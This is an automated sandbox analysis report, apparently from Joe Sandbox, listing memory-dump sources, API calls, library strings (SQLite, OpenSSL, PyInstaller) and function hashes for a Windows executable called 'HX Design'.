                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                                      • API String ID: 4225454184-1404302391
                                                                                                                                                                                                                                                      • Opcode ID: 8ce0bce7dde3a7cc6d609d5fdf3d34c648de0cfc592bf91cd3842dd1b93a9340
                                                                                                                                                                                                                                                      • Instruction ID: a402ad7ab2c7a6e73533319739228768064451d7a137627413ae2ee7dc4cae8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ce0bce7dde3a7cc6d609d5fdf3d34c648de0cfc592bf91cd3842dd1b93a9340
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF15A21B0AA83C2EB64AB25A960B793BA5FF41B84F144135DE6D877F9CF3CE4458301
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
                                                                                                                                                                                                                                                      • API String ID: 4225454184-879093740
                                                                                                                                                                                                                                                      • Opcode ID: ca8b265791fa095afaf02c55fc6e7a2128b016b84bd851fd7879d418747ccf8a
                                                                                                                                                                                                                                                      • Instruction ID: 1bcdfd5a4f1e219b99fd5b91f14ee4d899a4b7bc0f332760f75549d75633dd83
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca8b265791fa095afaf02c55fc6e7a2128b016b84bd851fd7879d418747ccf8a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6E1D022F0A7939BEB15DB258560AB827E6FB55B88F064131CE2C577E9CF38E451C340
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007B6570
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                                                                                      • API String ID: 4069847057-331183818
                                                                                                                                                                                                                                                      • Opcode ID: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                                      • Instruction ID: f2287e27fbedaf5def1050938dd7dac1d23cfc38087bcbb9f86d6b0deaf867c0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8f7dbaccdc9d46899aacf333f9608422b89dcb9bc9042fe5e6119822def30e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46D1B072A0C68286F762CF19A44037A67D1FBA5B80F145035EB8E977ECDE3CE8419B41
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                                                                                      • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                      • Instruction ID: 4fd0aca0971c72fa425bf99d301925014f6c8d49d116108ba1f4bead5319999a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44D1D332B08B429AEB20EF65D4407ADB7A0FB44788F900135EE4D57B96CF78E099D794
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF73207F0AA,?,?,00000294B2908EB8,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE8C
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF73207F0AA,?,?,00000294B2908EB8,00007FF73207AD53,?,?,?,00007FF73207AC4A,?,?,?,00007FF732075F3E), ref: 00007FF73207EE98
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                      • Instruction ID: 1ae3251433425d48dc2999c71131b0912bad1daea6f160dbf7a7001fc4b6ab02
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1412831B1AA02A1FA15FB1A9800675A391FF48B90FC84535DD1D47394EFBCE84DE360
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062C9E
                                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF732063706,?,00007FF732063804), ref: 00007FF732062D63
                                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF732062D99
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                      • Instruction ID: 45ceae76b9c750aa1d07ccff3a12140a5f95895c8197e93fc1470a1ba7bb68be
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2731D822708B4166E620BB25A8142BBA691FF88798F810136EF4D93759EF7CD54AD710
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                                      • API String ID: 0-1087561517
                                                                                                                                                                                                                                                      • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                      • Instruction ID: 21de8796a2953f165f9ecd7e4b154539f15bd7a799aaeb8e1a70b77284a8e036
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45D15B65B0CA4381FB56EA6295503FE13A5AF89784F848032DF0E47BEEDE7CE5068351
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                                      • API String ID: 0-2528746747
                                                                                                                                                                                                                                                      • Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                      • Instruction ID: da0e78a397066cdf44edec9c57f84cfda9a08ce15882782a9ed367bfc7bf4a28
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EB18165B08A4299FB12EB61D8802FD67A5BF85B84F404032EB8D07BFDDE7CE6058341
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • 00007FFE1A463010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFB35D0A0), ref: 00007FFDFB3190FD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                                      • API String ID: 4225454184-3538577999
                                                                                                                                                                                                                                                      • Opcode ID: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
                                                                                                                                                                                                                                                      • Instruction ID: 33ec0134d2096d16557d12876cedbd2b6531e098bdf681dadca03a08247bdd18
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a3484beb9c9ca2bbf2017b99d1a511fee6e4b4e06a0eb8fc86bdb3109459572
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B351A221F4B653A6FB15AB159820AB863D9AF46B98F046231CD6D473EDDE3DE4468300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD4D
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD5B
                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DD85
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDF3
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF73206DF7A,?,?,?,00007FF73206DC6C,?,?,?,00007FF73206D869), ref: 00007FF73206DDFF
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                      • Instruction ID: 0e0bd18d68acd259c9afd2594edc42d964b6ad71fa5ace60548169a8753dc1e1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3931D621B1A642A1EE11BB06A4006B5A3D4FF49BA4FD94535DD3E5B390DFBCE448D328
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF73206351A,?,00000000,00007FF732063F23), ref: 00007FF732062AA0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                      • Instruction ID: 6f41bccdc65c8b3659487b17931ac05f67b1741db81dcd0c9ea571957cf4e40e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5321A332719781A2E720AB55F8407E6A394FB88784F800132FE8C83759DFBCD149D750
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                                                                      • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                      • Instruction ID: 99ab8d3462857a18c1737d43d3f8125bc7726cb1d0dcaa71e4af67ac107d6d1d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9213231B0CA4252EB50AB55B58423AE3A0FF857A0F900235EA6D83BE5DEFCD44DDB14
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                                      • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                                      • Instruction ID: be417e27483c94adb8c49ff48fcef4bc5467617b84a97c80b7a7359d73fb7d4d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
